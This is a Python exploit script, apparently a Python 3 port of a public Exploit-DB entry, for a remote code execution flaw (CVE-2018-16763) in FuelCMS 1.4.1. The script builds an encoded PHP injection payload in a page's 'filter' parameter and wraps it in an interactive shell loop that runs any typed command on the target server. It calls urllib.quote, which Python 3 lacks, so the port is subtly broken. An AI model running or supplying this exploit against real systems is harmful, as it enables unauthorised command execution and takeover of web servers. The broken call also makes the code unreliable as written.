#!/bin/env python3
#
# fuelCMS 1.4.1 - Remote Code Execution 
#
# Port Author: n3m1.sys
# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
# 
# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
#
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

import requests
import urllib

url = "http://x.x.x.x:port" # Change this to the target URL
proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url)

while 1:
    command = input("$: ")
    exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
    r = requests.get(exploit_url, proxies=proxy)

    print(r.text[r.text.find("system")+6:r.text.find("<div ")])